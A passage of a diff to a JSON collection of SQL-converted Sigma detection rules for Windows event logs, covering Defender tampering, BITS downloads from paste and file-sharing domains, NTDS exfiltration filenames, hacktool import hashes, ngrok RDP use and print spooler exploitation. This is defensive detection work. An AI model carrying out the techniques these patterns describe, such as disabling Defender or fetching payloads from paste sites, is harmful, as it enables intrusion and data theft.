'\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" ], - "filename": "create_stream_hash_hacktool_download.yml" + "filename": "win_defender_amsi_trigger.yml" }, { - "title": "Unusual File Download from Direct IP Address", - "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "title": "Windows Defender Exploit Guard Tamper", + "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", "status": "experimental", - "description": "Detects the download of suspicious file type from URLs with IP", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Contents REGEXP 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" ], - "filename": "create_stream_hash_susp_ip_domains.yml" + "filename": "win_defender_exploit_guard_tamper.yml" }, { - "title": "Exports Registry Key To an Alternate Data Stream", - "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", - "status": "test", - "description": "Exports the target Registry key and hides it in the specified alternate data stream.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "title": "Microsoft Defender Tamper Protection Trigger", + "id": "49e5bc24-8b86-49f1-b743-535f332c2856", + "status": "stable", + "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", + "author": "Bhabesh Raj, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator might try to disable defender features during testing (must be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" ], - "filename": "create_stream_hash_regedit_export_to_ads.yml" + "filename": "win_defender_tamper_protection_trigger.yml" }, { - "title": "Suspicious File Download From File Sharing Websites", - "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", - "status": "experimental", - "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Defender Suspicious Configuration Changes", + "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", + "status": "stable", + "description": "Detects suspicious changes to the windows defender configuration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator activity (must be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" ], - "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" + "filename": "win_defender_suspicious_features_tampering.yml" }, { - "title": "Suspicious NTDS Exfil Filename Patterns", - "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", - "status": "test", - "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", + "title": "BITS Transfer Job Download To Potential Suspicious Folder", + "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", + "status": "experimental", + "description": "Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "file_event_win_ntds_exfil_tools.yml" + "filename": "win_bits_client_new_trasnfer_susp_local_folder.yml" }, { - "title": "Office Template Creation", - "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", + "title": "BITS Transfer Job Download From Direct IP", + "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", "status": "experimental", - "description": "Detects creation of template files for Microsoft Office from outside Office", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects a BITS transfer job downloading file(s) from a direct IP address.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.persistence", - "attack.t1137" + "attack.t1197" ], "falsepositives": [ - "Loading a user environment from a backup or a domain controller", - "Synchronization of templates" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR Image LIKE '%\\\\EXCEL.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE '%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" ], - "filename": "file_event_win_word_template_creation.yml" + "filename": "win_bits_client_new_transfer_via_ip_address.yml" }, { - "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", - "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", - "status": "test", - "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "title": "BITS Transfer Job Download From File Sharing Domains", + "id": "d635249d-86b5-4dad-a8c7-d7272b788586", + "status": "experimental", + "description": "Detects BITS transfer job downloading files from a file sharing domain.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Unknown", - "Possibly some Microsoft Edge upgrades" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE '%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" + "filename": "win_bits_client_new_transfer_via_file_sharing_domains.yml" }, { - "title": "Legitimate Application Dropped Executable", - "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", + "title": "Ngrok Usage with Remote Desktop Service", + "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", "status": "experimental", - "description": "Detects programs on a Windows system that should not write executables to disk", - "author": "frack113, Florian Roth", + "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" ], - "filename": "file_event_win_legitimate_app_dropping_exe.yml" + "filename": "win_terminalservices_rdp_ngrok.yml" }, { - "title": "Hijack Legit RDP Session to Move Laterally", - "id": "52753ea4-b3a0-4365-910d-36cff487b789", + "title": "CVE-2021-1675 Print Spooler Exploitation", + "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", "status": "test", - "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", - "author": "Samir Bousseaden", + "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1569", + "cve.2021.1675" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 \" OR \"mimispool\"')))" ], - "filename": "file_event_win_tsclient_filewrite_startup.yml" + "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml" }, { - "title": "Suspicious ASPX File Drop by Exchange", - "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", + "title": "Code Integrity Attempted DLL Load", + "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", + "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "status": "experimental", - "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", - "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Antivirus products" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Microsoft Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\assembly\\\\GAC\\\\%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy IN ('1', '2')) OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" ], - "filename": "file_event_win_exchange_webshell_drop.yml" + "filename": "win_codeintegrity_attempted_dll_load.yml" }, { - "title": "File Creation In Suspicious Directory By Msdt.EXE", - "id": "318557a5-150c-4c8d-b70e-a9910e199857", + "title": "Block Load Of Revoked Driver", + "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", + "description": "Detects blocked load attempts of revoked drivers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "status": "experimental", - "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities", - "author": "Vadim Varganov, Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001", - "cve.2022.30190" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE 